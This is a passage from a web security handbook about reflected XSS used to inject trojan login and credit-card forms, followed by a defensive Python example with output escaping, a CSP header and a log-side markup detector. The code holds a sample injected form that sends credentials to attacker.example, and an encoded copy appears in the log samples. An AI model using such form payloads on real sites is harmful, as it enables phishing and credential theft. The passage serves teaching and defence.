The Web Application Hacker’s Handbook Discovering and Exploiting Security Flaws




Injecting Trojan Functionality

This attack goes beyond virtual defacement and injects actual working functionality into the vulnerable application, designed to deceive end users into performing some undesirable action, such as entering sensitive data that is then transmitted to the attacker.

An obvious attack involving injected functionality is to present users with a Trojan login form that submits their credentials to a server controlled by the attacker. If skillfully executed, the attack may also seamlessly log the user in to the real application, so that they do not detect any anomaly in their experience. The attacker is then free to use the victim’s credentials for his own purposes. This type of payload lends itself well to a phishing-style attack, in which users are fed a crafted URL within the actual authentic application and advised that they will need to log in as normal to access it.

Another obvious attack is to ask users to enter their credit card details, usually with the inducement of some attractive offer. For example, Figure 12-8 shows a proof-of-concept attack created by Jim Ley, exploiting a reflected XSS vulnerability found in Google in 2004.
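The injected-form payloads described above depend on a reflected parameter reaching the page as live markup. The following added example (not code from the book or from any application it discusses) shows the server-side difference between reflecting a parameter raw and reflecting it HTML-escaped, a Content-Security-Policy that keeps any form on the page from submitting anywhere but the site's own origin, and a simple log-side check that flags request parameters carrying form or script markup. The request lines, the `attacker.example` host and the function names are constructed for illustration.

```python
import html
import re
from urllib.parse import urlsplit, parse_qs

# Constructed sample: a reflected parameter value carrying form markup, using a
# placeholder host. In a real reflected XSS the same string would arrive in a
# crafted URL and be echoed into the page by the vulnerable handler.
INJECTED_FORM = '<form action="https://attacker.example/collect"><input name="pw"></form>'


def render_search_vulnerable(query: str) -> str:
    """Reflects the query unescaped: any markup in it becomes part of the page."""
    return f"<p>Results for: {query}</p>"


def render_search_hardened(query: str) -> str:
    """Reflects the query HTML-escaped, so <, >, & and quotes are shown as text
    and cannot open a new element or attribute."""
    return f"<p>Results for: {html.escape(query, quote=True)}</p>"


def contains_live_form(page: str) -> bool:
    """Does the rendered page contain an unescaped <form tag? Used here only to
    make the vulnerable/hardened difference visible."""
    return "<form" in page


def csp_header() -> str:
    """A Content-Security-Policy value for the login page. form-action 'self'
    means even an injected form cannot submit to a foreign origin; script-src
    'self' blocks inline and third-party script; base-uri 'self' stops a
    <base> injection from redirecting relative form actions."""
    return (
        "default-src 'self'; script-src 'self'; form-action 'self'; "
        "object-src 'none'; base-uri 'self'"
    )


# Constructed sample request targets as they might appear in an access log.
SAMPLE_REQUESTS = [
    "/search?q=cheap+flights",
    "/search?q=%3Cform+action%3D%22https%3A%2F%2Fattacker.example%2Fc%22%3E",
]

_MARKUP = re.compile(r"<\s*(form|script|iframe|base)\b", re.IGNORECASE)


def flag_markup_in_params(request_target: str) -> list:
    """Return the names of query parameters whose decoded value contains
    form/script/iframe/base markup. parse_qs undoes percent-encoding and '+',
    so the check runs on what the application would actually have reflected."""
    params = parse_qs(urlsplit(request_target).query, keep_blank_values=True)
    return [name for name, values in params.items()
            if any(_MARKUP.search(v) for v in values)]


if __name__ == "__main__":
    print(render_search_vulnerable(INJECTED_FORM))
    print(render_search_hardened(INJECTED_FORM))
    print(csp_header())
    for target in SAMPLE_REQUESTS:
        print(target, "->", flag_markup_in_params(target))
```

Escaping at the point of output is what removes the attack surface; the CSP `form-action` directive is a second layer that limits what an injected form could do if escaping is ever missed, and the parameter check is a cheap triage signal for logs rather than a substitute for either.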

